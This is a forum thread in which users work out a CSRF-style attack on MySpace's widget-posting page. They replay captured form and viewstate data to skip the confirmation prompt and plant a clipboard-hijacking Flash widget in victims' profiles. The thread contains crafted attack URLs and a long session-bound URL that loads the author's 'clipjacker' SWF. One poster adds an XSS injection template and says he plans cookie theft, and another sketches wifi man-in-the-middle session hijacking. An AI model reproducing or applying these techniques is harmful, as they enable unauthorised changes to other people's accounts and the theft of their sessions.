MySpace Widget Flaw

[digip]

Disclaimer: This is for educational purposes only! Use at your own risk!!

edit: Well, after testing it on another account, it looks like it may be tied together with something else, like cookie data, because as soon as I click the test link from another account, it redirects me to the MySpace front page. I think it probably only works on session data, but I can't confirm it at this point.

I was on the Obama MySpace site today and looking at their Tax widget. I was looking at how they allow you to post it to your page, and what the mechanism was behind it. Using Wireshark I was able to discern that you can bypass the page that asks for your permission to post it to your page, and post it directly to your about me section without it ever prompting you! To test this, I added a nooblube flash widget I create that hijacks the clipboard so anything you copy and paste comes up as www.nooblube.com

The implications to this is that you can essentially embed any Flash object into someones page so long as two things are true.

1 - They have to actually be logged in to their myspace account.

2- They have to click the link you send them or direct them to. Wether it be in an email(Using something like Tinyurl to hide it), on a any website, or a meta-refresh redirect to the link on some page you can lure them to, so they don't even have to actually click it to make it work.

Lets look at the process at which MySpace thinks it is keeping your pages secure while allowing you to add the widget to their page.

The following code is a link provided by the Obama Widget to ad dit to your page.

http://www.myspace.com/Modules/PostTo/Pages?l=3&u=&t=Obama+Tax+Calculator+Widget&c=%3cobject+type%3d%22application%2fx-shockwave-flash%22+data%3d%22http%3a%2f%2fwidgets.clearspring.com%2fo%2f48f203eebb67a86f%2f48f73997210d93f4%2f48f4f7ad9ac67fda%2ffecf3d5d%22+id%3d%22W48f203eebb67a86f48f73997210d93f4%22+width%3d%22190%22+height%3d%22510%22%3e%3cparam+name%3d%22movie%22+value%3d%22http%3a%2f%2fwidgets.clearspring.com%2fo%2f48f203eebb67a86f%2f48f73997210d93f4%2f48f4f7ad9ac67fda%2ffecf3d5d%22+%2f%3e%3cparam+name%3d%22wmode%22+value%3d%22transparent%22+%2f%3e%3cparam+name%3d%22allowNetworking%22+value%3d%22internal%22+%2f%3e%3cparam+name%3d%22allowScriptAccess%22+value%3d%22never%22+%2f%3e%3c%2fobject%3e

The following is the decoded link info:

http://www.myspace.com/Modules/PostTo/Pages?l=3&u=&t=Obama Tax Calculator Widget&c=<object type="application/x-shockwave-flash" data="http://widgets.clearspring.com/o/48f203eebb67a86f/48f73997210d93f4/48f4f7ad9ac67fda/fecf3d5d" id="W48f203eebb67a86f48f73997210d93f4" width="190" height="510"><param name="movie" value="http://widgets.clearspring.com/o/48f203eebb67a86f/48f73997210d93f4/48f4f7ad9ac67fda/fecf3d5d" /><param name="wmode" value="transparent" /><param name="allowNetworking" value="internal" /><param name="allowScriptAccess" value="never" /></object>

I used http://meyerweb.com/eric/tools/dencoder/ to decode the link.

Now you can add whatever flash link you want and change the information and without even URL encoding it(Which breaks it) copy and past it into your browser. (NOTE: You must be logged in to see this working).

It then redirects you to a page, asking you to confirm your request:

Before you can Post: "Obama Tax Calculator Widget"

Please Confirm You Really Want to!

Once on this page, you can decide where on your page to post it. The default is the "About Me" box on your myspace page.

When you click Post, it then redirects you to your profile and you the new widget show up in your page. To remove it, just edit your profile and remove the code.

Now, in Wireshark(You had it running this whole time right?) you will see the link above, and further down in the packet under the referrer and cookies you will see some data that begins with the line of

__EVENTTARGET=&__EVENTARGUMENT=&

Copy this whole section up to the part where it says http/1.1(Without the http/1.1)

Take the original link above (URL encoded one or the decoded one) and add a slash at the end of the url and paste that big long URL/Form encoded mess of a link to the end of it. Copy the whole thing and put it in your browser and it will BYPASS the need to confirm adding it to your page.

Now, I haven't tested this much further than on my own account, but I am going to play with this a bit more and see what happens when someone coming to my site clicks my nooblube link and if it shows up on their page. My next bit will be trying to get executable javascript into the page via flash widget this way or just via the link bypassing method I just described.

If anyone feels confident enough to try my hack and see if it adds the nooblube widget to their page, feel free to logon to your MySpace account and then click this link to test my findings: http://www.twistedpairrecords.com/digip/MySpaceWidget.html

If for any reason it doesn't work, please let me know so I can see if it is somehow posting session data from my account(Which I really don't care if you see it. Whatever...) specifically targeting only one account, or if it works for anyone who clicks it.

edit: Well, after testing it on another account, it looks like it may be tied together with something else, like cookie data, because as soon as I click the test link from another account, it redirects me to the MySpace front page. I think it probably only works on session data, but I can't confirm it at this point.

[digip]

One way I can see this taking effect is with a wifi MITM attack, grabbing the users session data, redirecting them to the prompt page for a widget, then again redirecting them to the auto submit link after grabbing their respective data from Wireshark. It would need to be combined with some sort of ettercap filter that serves the user with the auto submit link once all the data is compiled into the link. Not an easy task, but I also think not impossible for someone to come up with an app to automate the process. Way over my head though. As of right now, I am only able to create this scenario under my own account.

[m0u53]

thats awsome great find...yet another myspace exploit !!!yame!!!

[digip]

thats awsome great find...yet another myspace exploit !!!yame!!!

I don't know how great of a find it is, but I can only get it to work manually, not for each visitor to the link.

What happens is if you try the link, it redirects you to the MySpace home page(If you are logged on). This is not what should happen and in my initial testing it posts the widget directly to the page.

If you are not logged on and click the link, you get the login page, which requires you to login to see anything. Once logged in, it asks you to "approve" the addition of the widget, so it's not working fully the way I can get it work with my own session data which I am also trying to figure out how to bypass.

Some of the data in the encoded form data is also present in the cookiedata that MySpace sets, so it is somehow tied into this whole bit. I suspect it may be possible to set a cookie with the data in it, but since the cookie would be set from a site outside of MySpace's domain, it probably will never get called properly and won't work. If cookies could be forged and made to look as if they are legit from MySpace, I think it may then be possible to manipulate all the data and then bypass the widget prompt the way I can with my own account. Then just construct a page that automates all the cookie and form data forging and get someone to view that page.

[DingleBerries]

Giving a 3rd party application the ability to modify a users private/personal account directly, even with permission, is an exploit in my opinion. The user should be the one copy/pasting the info, not the application. If there is an api available for this then its is a matter of time before there are numerous attacks made around this "feature". Also that didnt work

[DingleBerries]

So this is a "feature" All you have to do is craft the url and it will change the object and Tittle. I think i may have a new project Thanks digip. Im going to try and insert some xss and what not.. Maybe steal some cookies?! If you want to go at this in tangent let me know

The page accepts some endoced txt.. example

Hex

%44%69%6E%67%6C%65%42%65%72%72%69%65%73%20%72%20%69%6E%20%79%6F%75%72%20%62%61%73%65%73

is the same as "DingleBerries r in your bases"

Trying to insert an image gave me a "terms of Service Violation" :/

Also.. You have alot of room with the url. Here is a template, this doenst do anything.

myspace.com/Modules/PostTo/Pages/?l=3&u=&t=Test&c=<object><script a=">'>" SRC="test"></SCRIPT></object>

If i didnt have class in 15mins i could prolly have some xss going.. And since its a myspace.com link it wont give you that "WARNING" page when a user clicks it.

[digip]

To give you an idea of what I was using, here is the BIG long url that bypasses the confirmation page. It wont work for anyone as it was tied to my current session when I was signed in, so its expired at this point.

http://www.myspace.com/Modules/PostTo/Pages/Default.aspx?l=3&u=&t=This%20is%20a%20Test&c=%3Cobject%20type=%22application/x-shockwave-flash%22%20data=%22http://www.twistedpairrecords.com/digip/nooblubeclipjacker.swf%22%20id=%22W48f203eebb67a86f48f72ee0916689c0%22%20width=%22190%22%20height=%22510%22%3E%3Cparam%20name=%22movie%22%20value=%22http://www.twistedpairrecords.com/digip/nooblubeclipjacker.swf%22%20/%3E%3Cparam%20name=%22wmode%22%20value=%22transparent%22%20/%3E%3Cparam%20name=%22allowNetworking%22%20value=%22internal%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22never%22%20/%3E%3C/object%3E/__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTkyODUzMzI1Ng9kFgJmD2QWBGYPFgIeBFRleHRlZAIDD2QWAgIBEGRkFg4CBA8WAh8ABUA
gPHNwYW4gY2xhc3M9J2NvbmZpcm1hdGlvbmdyZWV0aW5ndGl0bGUnPiJUaGlzIGlzIGEgVGVzdCI8L3N
w
YW4%2BZAIFDxYCHwAFKlRoaXMgaXMgaG93IGl0IHdpbGwgYXBwZWFyIG9uIHlvdXIgcHJvZmlsZWQCBg8WAh
8ABbQEPGIgaWQ9J3RpdGxlY29udGFpbmVyJz5UaGlzIGlzIGEgVGVzdDwvYj48cD48b2JqZWN0IHR5cG
U
9ImFwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXNoIiBhbGxvd1NjcmlwdEFjY2Vzcz0ibmV2ZXIiIGF
s
bG93TmV0d29ya2luZz0iaW50ZXJuYWwiIGhlaWdodD0iNTEwIiB3aWR0aD0iMTkwIiBpZD0iVzQ4ZjIw
M
2VlYmI2N2E4NmY0OGY3MmVlMDkxNjY4OWMwIiBkYXRhPSJodHRwOi8vd3d3LnR3aXN0ZWRwYWlycmVjb
3
Jkcy5jb20vZGlnaXAvbm9vYmx1YmVjbGlwamFja2VyLnN3ZiI%2BCiAgPHBhcmFtIG5hbWU9ImFsbG93U2NyaXB0QWNjZXNzIiB2YWx1ZT0ibmV2ZXIiIC8%2BCiAgPHBhcmFtIG5hbWU9ImFsbG93TmV0d29ya2luZyIgdmFsdWU9ImludGVybmFsIiAvPgogIDxwYX
JhbSBuYW1lPSJtb3ZpZSIgdmFsdWU9Imh0dHA6Ly93d3cudHdpc3RlZHBhaXJyZWNvcmRzLmNvbS9kaW
d
pcC9ub29ibHViZWNsaXBqYWNrZXIuc3dmIiAvPgogIDxwYXJhbSBuYW1lPSJ3bW9kZSIgdmFsdWU9InR
y
YW5zcGFyZW50IiAvPgo8L29iamVjdD48L3A%2BPHAgaWQ9J2NvbW1lbnRzY29udGFpbmVyJz48L3A%2BZAIHD2QWAmYPZBYCAgEPZBYGAgUPEGQQFRsEbm9uZRNBcnQgYW5kIFBob3RvZ3JhcGh5CkF1dG9tb3
RpdmUIQmxvZ2dpbmcbRHJlYW1zIGFuZCB0aGUgU3VwZXJuYXR1cmFsGEZhc2hpb24sIFN0eWxlLCBTaG
9
wcGluZxRGb29kIGFuZCBSZXN0YXVyYW50cwdGcmllbmRzBUdhbWVzE0dvYWxzLCBQbGFucywgSG9wZXM
T
Sm9icywgV29yaywgQ2FyZWVycwRMaWZlF01vdmllcywgVFYsIENlbGVicml0aWVzBU11c2ljB015U3Bh
Y
2URTmV3cyBhbmQgUG9saXRpY3MVUGFydGllcyBhbmQgTmlnaHRsaWZlEFBldHMgYW5kIEFuaW1hbHMHU
G
9kY2FzdAtRdWl6L1N1cnZleRdSZWxpZ2lvbiBhbmQgUGhpbG9zb3BoeRlSb21hbmNlIGFuZCBSZWxhdG
l
vbnNoaXBzFlNjaG9vbCwgQ29sbGVnZSwgR3JlZWsGU3BvcnRzEVRyYXZlbCBhbmQgUGxhY2VzD1dlYiw
g
SFRNTCwgVGVjaBJXcml0aW5nIGFuZCBQb2V0cnkVGwEwATEBNAEyATYBMwE3ATgBOQIxMAIxMQIxMgIx
N
AIxNQIxNgIxNwIxOAIxOQIyNgIyMAIyMQIxMwIyMgIyMwIyNAE1AjI1FCsDG2dnZ2dnZ2dnZ2dnZ2dnZ
2
dnZ2dnZ2dnZ2dnZxYBZmQCCg8QZBAV4wEPTm9uZSwgb3Igb3RoZXI6DGFjY29tcGxpc2hlZAZhZG9yZW
Q
LYWR2ZW50dXJvdXMKYWdncmF2YXRlZAdhbW9yb3VzBmFtdXNlZAVhbmdyeQZhbmdzdHkIYW5pbWF0ZWQ
H
YW5ub3llZAdhbnhpb3VzCWFwYXRoZXRpYw1hcmd1bWVudGF0aXZlB2Fyb3VzZWQIYXJ0aXN0aWMHYXNo
Y
W1lZAVhd2FrZQhiZXRyYXllZAZiaXRjaHkEYmxhaAVibGFuawdibGVzc2VkCGJsaXNzZnVsCGJsdXN0Z
X
J5BWJvcmVkBmJvdW5jeQZicmVlenkHYnVsbGllZAZidW1tZWQEYnVzeQRjYWxtDGNhbnRhbmtlcm91cw
l
jYXRhbHl6ZWQIY2hlZXJmdWwFY2hpbGwHY2hpcHBlcgRjb2xkCmNvbXBsYWNlbnQJY29uZmlkZW50CGN
v
bmZ1c2VkDWNvbnRlbXBsYXRpdmUHY29udGVudAtjb29reS93YWNreQZjcmFua3kGY3JhcHB5BWNyYXp5
C
GNyZWF0aXZlBWNydW5rB2NydXNoZWQIY3VsdHVyZWQHY3VyaW91cwdjeW5pY2FsCWRlcHJlc3NlZApkZ
X
Rlcm1pbmVkB2RldmlvdXMFZGlydHkMZGlzYXBwb2ludGVkCmRpc2NvbnRlbnQJZGlzZ3VzdGVkDGRpc3
R
yYWN0YWJsZQpkaXN0cmF1Z2h0CmRpc3RyZXNzZWQFZGl0enkFZG9ya3kHZHJhaW5lZAVkcnVuawllY2N
l
bnRyaWMIZWNzdGF0aWMIZWxlY3RyaWMLZW1iYXJyYXNzZWQJZW5lcmdldGljC2VubGlnaHRlbmVkB2Vu
c
mFnZWQKZW50aHJhbGxlZAdlbnZpb3VzBGV2aWwJZXhhbmltYXRlB2V4Y2l0ZWQJZXhoYXVzdGVkBmV4b
3
RpYwhmYWJ1bG91cwpmYXNjaW5hdGVkCWZlcm1lbnRlZAZmbGlydHkHZm9jdXNlZAlmb3Jnb3R0ZW4GZn
J
pc2t5BmZyb2dneQpmcnVzdHJhdGVkBGZ1bGwHZ2FsbGFudAVnZWVreQVnaWRkeQZnaWdnbHkGZ2xvb21
5
BGdvb2QIZ3JhdGVmdWwGZ3JvZ2d5BmdydW1weQZndWlsdHkIaGFuZHNvbWUFaGFwcHkEaGlnaAdob3Bl
Z
nVsBWhvcm55A2hvdAhodW5nb3ZlcgZodW5ncnkFaHlwZXILaW1hZ2luYXRpdmUJaW1wYXRpZW50Cmltc
G
VydmlvdXMKaW1wbGFjYWJsZQlpbXByZXNzZWQNaW5kZXNjcmliYWJsZQtpbmRpZmZlcmVudAlpbmRpZ2
5
hbnQKaW5mdXJpYXRlZAtpbnF1aXNpdGl2ZQhpbnNwaXJlZA1pbnN1Ym9yZGluYXRlB2ludGVuc2ULaW5
0
aW1pZGF0ZWQFaXJhdGUJaXJyaXRhdGVkB2plYWxvdXMEamVkaQVqb2xseQhqdWJpbGFudAhrbmlnaHRl
Z
ARsYXp5CWxldGhhcmdpYwhsaXN0bGVzcwZsb25lbHkFbG92ZWQIbHVtaW5vdXMDbWFkCm1lbGFuY2hvb
H
kGbWVsbG93C21pc2NoaWV2b3VzCW1pc2VyYWJsZQVtb29keQZtb3Jvc2UHbmF1Z2h0eQluYXVzZWF0ZW
Q
JbmVnbGVjdGVkBW5lcmR5B25lcnZvdXMFbmluamEJbm9zdGFsZ2ljBG51bWIKb2JzZXF1aW91cwRva2F
5
Cm9wdGltaXN0aWMOb3ZlcnN0aW11bGF0ZWQIcGVhY2VmdWwGcGVldmVkB3BlbnNpdmULcGVzc2ltaXN0
a
WMGcGlyYXRlCnBpc3NlZCBvZmYFcGlzc3kGcGxheWVkB3BsZWFzZWQGcHJldHR5CnByb2R1Y3RpdmUKc
H
VnbmFjaW91cwRwdXJlBXF1aWV0CHF1aXhvdGljCnJlYmVsbGlvdXMJcmVjdW1iZW50CXJlZnJlc2hlZA
h
yZWplY3RlZAtyZWp1dmVuYXRlZAdyZWxheGVkCHJlbGlldmVkCHJlc3RsZXNzBnJvY2tpbghyb21hbnR
p
YwZydXNoZWQDc2FkBXNhc3N5CXNhdGlzZmllZAZzYXZhZ2UGc2NhcmVkCXNlbGVjdGl2ZQdzaG9ja2Vk
B
HNpY2sFc2lsbHkGc2xlZXB5BXNtYXJ0B3NtaXR0ZW4Gc25lYWt5BnNuZWV6eQRzb3JlB3N0YWxrZWQGc
3
Rva2VkCHN0cmVzc2VkBnN0cm9uZwlzdXJwcmlzZWQGc3dlYXR5C3N5bXBhdGhldGljCXRhbGthdGl2ZQ
Z
0ZXN0ZWQIdGhhbmtmdWwHdGhpcnN0eQp0aG91Z2h0ZnVsBXRpcmVkB3RvdWNoZWQKdHJpdW1waGFudA1
1
bmNvbWZvcnRhYmxlD3VuZGVyc3RpbXVsYXRlZAR1c2VkCXZhbGlkYXRlZAh2ZWhlbWVudAV2ZXhlZAd2
a
WJyYW50CHZpcmdpbmFsBXZpdGFsCnZvbHVtaW5vdXMGd2FudGVkBHdhcm0Fd2VpcmQHd29ya2luZwd3b
3
JyaWVkFeMBATACOTADMTM1AzEzNgExAzEzNwI0NAEyAzEzOAMxMzkBMwE0AzExNAMxNDADMTQxAzEwOA
M
xNDICODcDMTQzAzExMAI5MgMxMTMDMTQ0AzE0NQMxNDYBNQI1OQMxNDcDMTQ4AzE0OQI5MQI2OAMxNTA
D
MTUxAzEyNQMxNTICOTkCODQCNjMDMTUzATYDMTAxAjY0AzE1NAE4ATcDMTA2AzEwNwMxNTUDMTI5AzE1
N
gI1NgMxMDQBOQI0NQMxMzADMTE5AjU1AjEwAzE1NwMxNTgDMTU5AzEyNwIzNQMxMTUCNDACMzQDMTYwA
j
k4AzE2MQI3OQIxMQMxNjICMTICMTMCODADMTYzAjc4AjQxAjE0AzE2NAMxNjUDMTY2AzE2NwI2NwMxNj
g
DMTY5AzE3MAMxNzECNDcCOTMDMTcyAzEwMwMxMjACNzICMzgDMTI2AzEzMgI1MQI5NQMxMTEDMTczAjE
1
AjE2AjQzAjE3AjgzAzE3NAIxOAI1MgMxNzUDMTc2AzE3NwMxNzgDMTE2AjQ4AjY1AzE3OQIxOQMxODAD
M
TgxAzE4MgMxODMDMTI4AjIwAzExMgMxMzMDMTg0AzE4NQIyMQMxODYCMzMCNzUCNzYCMjICODYDMTg3A
z
E4OAIzOQI1NwIzNgMxODkCMjMCMzcDMTE3Ajk3AzE5MAMxMDIDMTM0AzE5MQI2MAMxMjQDMTkyAjYxAj
c
wAzE5MwI1OAMxOTQCNzMCNzEDMTk1AjI0AzE5NgMxOTcDMTA5AzE5OAI4OQMxOTkDMjAwAzIwMQMxMDU
D
MjAyAjc3AjY5AzEyMwI2MgI1MwI0MgI1NAMyMDMDMjA0AzEwMAIyNQMyMDUCMjYDMTE4AjQ2AzIwNgMx
M
jICODICNjYCNDkDMjA3AzIwOAMyMDkDMjEwAjI3AzIxMQMyMTICMjgDMjEzAzEyMQMyMTQCODEDMjE1A
z
IxNgMxMzECMjkCMzACMzECMzIDMjE3Ajc0AzIxOAMyMTkDMjIwAzIyMQMyMjIDMjIzAzIyNAMyMjUDMj
I
2AzIyNwMyMjgCOTYCODgCODUUKwPjAWdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d
n
Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dn
Z
2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ
2
dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2
d
nZ2dnZ2dnFgFmZAIQDxBkEBUEB1B1YmxpYyAGRGlhcnkgCEZyaWVuZHMgE1ByZWZlcnJlZCZuYnNwO0x
p
c3QVBAEwATEBMgEzFCsDBGdnZ2cWAWZkAggPEGQQFQoMUG9zdCBUbyBCbG9nEFBvc3QgdG8gQnVsbGV0
a
W4QUG9zdCB0byBBYm91dCBNZRhQb3N0IHRvIEknZCBMaWtlIHRvIE1lZXQRUG9zdCB0byBJbnRlcmVzd
H
MNUG9zdCB0byBNdXNpYw5Qb3N0IHRvIE1vdmllcxJQb3N0IHRvIFRlbGV2aXNpb24NUG9zdCB0byBCb2
9
rcw5Qb3N0IHRvIEhlcm9lcxUKATEBMgEzATQBNQE2ATcBOAE5AjEwFCsDCmdnZ2dnZ2dnZ2cWAQICZAI
J
Dw8WAh8ABQdQb3N0IEl0ZGQCCg8WAh4HVmlzaWJsZWdkGAEFGmN0bDAwJGNwTWFpbiRFZGl0TXVsdGlW
a
WV3Dw9kAgJk&hashChecker=MIGnBgorBgEEAYI3WAOSoIGYMIGVBgorBgEEAYI3WAMBoIGGMIGDAgMCAAECAmYD
AgIAwAQIGUFFr8gZOiAEEBurrMcQGLXN9VpxSpybgZ0EWFo2i2uKZzAhfnh5cgPYQTK85zxGubs%252fvmcZTqSDn9BvPgCEaZrMfvPpA7dIfTKCbAZk7rxxwEgO7m0no5R%252fr%252bHZKSgCxuKU1CLrX0apOyRFPF1K16lz6yw%253d&ctl00%24cpMain%24AboutMeEdit%24tbxSubject=This+is+a+Test&ctl00%24cpMain%24AboutMeEdit%24tbxBody=&ctl00%24cpMain%24AboutMeEdit%24hdnContent=Jmx0O29iamVjdCB0eXBlPSZxdW90O2FwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXN
oJnF1b3Q7IGRhdGE9JnF1b3Q7aHR0cDovL3d3dy50d2lzdGVkcGFpcnJlY29yZHMuY29tL2RpZ2lwL25
v
b2JsdWJlY2xpcGphY2tlci5zd2YmcXVvdDsgaWQ9JnF1b3Q7VzQ4ZjIwM2VlYmI2N2E4NmY0OGY3MmVl
M
DkxNjY4OWMwJnF1b3Q7IHdpZHRoPSZxdW90OzE5MCZxdW90OyBoZWlnaHQ9JnF1b3Q7NTEwJnF1b3Q7J
m
d0OyZsdDtwYXJhbSBuYW1lPSZxdW90O21vdmllJnF1b3Q7IHZhbHVlPSZxdW90O2h0dHA6Ly93d3cudH
d
pc3RlZHBhaXJyZWNvcmRzLmNvbS9kaWdpcC9ub29ibHViZWNsaXBqYWNrZXIuc3dmJnF1b3Q7IC8mZ3Q
7
Jmx0O3BhcmFtIG5hbWU9JnF1b3Q7d21vZGUmcXVvdDsgdmFsdWU9JnF1b3Q7dHJhbnNwYXJlbnQmcXVv
d
DsgLyZndDsmbHQ7cGFyYW0gbmFtZT0mcXVvdDthbGxvd05ldHdvcmtpbmcmcXVvdDsgdmFsdWU9JnF1b
3
Q7aW50ZXJuYWwmcXVvdDsgLyZndDsmbHQ7cGFyYW0gbmFtZT0mcXVvdDthbGxvd1NjcmlwdEFjY2Vzcy
Z
xdW90OyB2YWx1ZT0mcXVvdDtuZXZlciZxdW90OyAvJmd0OyZsdDsvb2JqZWN0Jmd0Ow%3D%3D&ctl00%24cpMain%24AboutMeEdit%24hdnUrl=&ctl00%24cpMain%24ddlPostType=3&ctl00%24cpMain%24btnPostIt=Post+It

Somewhere in there is data that is also in the cookie, so I think it references session data while posting the info. This way it expires if you logout and log back in, the trick doesn't work and only redirects you to the main page. What is weird though, is if you follow the link when logged out, then login, as soon as you login you get a message asking you to approve the widget. So there may be a possible way to do this if we can decode their form output between __EVENTTARGET and PostIt=Post+It

[DingleBerries]

This is my first time getting my hands dirty with flash, and i must say ive googled most of the information. Really cool if anything comes from this.. if only i had a face book to play around with

[digip]

One thing I know MySpace uses if Cold Fusion Modules. If anyone knows of any flas in Cold Fusion, might be able to attach some sort of CFM page in there as well as the flash widget. Not sure hwo that works, but just brainstorming at the moment.

[DingleBerries]

I can insert images and flash or images alone now. Javascript cannot be ran outside the <object> so no alerts. Im still trying other things atm